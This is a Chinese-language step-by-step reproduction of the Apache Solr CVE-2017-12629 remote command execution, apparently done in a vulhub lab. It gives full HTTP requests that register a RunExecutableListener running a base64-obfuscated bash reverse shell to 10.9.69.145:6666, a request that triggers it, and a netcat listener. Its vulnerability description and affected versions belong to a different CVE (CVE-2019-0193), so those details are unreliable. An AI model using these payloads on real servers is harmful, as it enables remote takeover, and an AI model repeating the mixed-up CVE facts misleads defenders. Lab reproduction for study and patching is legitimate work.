Apache Solr 远程命令执行漏洞(CVE-2017-12629)

Apache Solr 远程命令执行漏洞(CVE-2017-12629)

漏洞描述:

2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。此次漏洞出现在Apache
Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

风险等级:

影响版本:

Apache Solr < 8.2.0

漏洞复现:
[1] 查看任务列表

GET /solr/demo/config HTTP/1.1
Host: 10.9.69.145:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Apache Solr 远程命令执行漏洞(CVE-2017-12629)_第1张图片

[2] 直接反弹不生效,可能是>&等特殊字符导致,我们使用bash64编码后的代码进行反弹

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjY5LjE0NS82NjY2IDA+JjE=|base64 -d|bash -i

Apache Solr 远程命令执行漏洞(CVE-2017-12629)_第2张图片

[3] 创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数,设置exe的值为反弹shell的命令
Apache Solr 远程命令执行漏洞(CVE-2017-12629)_第3张图片

POST /solr/demo/config HTTP/1.1
Host: 10.9.69.145:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 219

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjY5LjE0NS82NjY2IDA+JjE=|base64 -d|bash -i"]}}

[4] 进行update操作,触发刚才添加的listener(多发几次):
Apache Solr 远程命令执行漏洞(CVE-2017-12629)_第4张图片

POST /solr/demo/update HTTP/1.1
Host: 10.9.69.145:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]

[5] 本地监听6666端口,成功反弹shell
Apache Solr 远程命令执行漏洞(CVE-2017-12629)_第5张图片

nc -lvvp 6666

基础环境:
https://vulhub.org/#/environments/solr/CVE-2017-12629-XXE/

漏洞修复:

1、添加Solr访问控制,包括禁止本地直接未授权访问;
2、升级版本至7.1,该版本已经解决了XML解析问题并删除了RunExecutableListener类;
3、针对XXE可手动修改CoreParser.java文件,按照通常防止基于DOM解析产生XXE的防范方法修复即可;

你可能感兴趣的:(漏洞复现,apache,安全漏洞)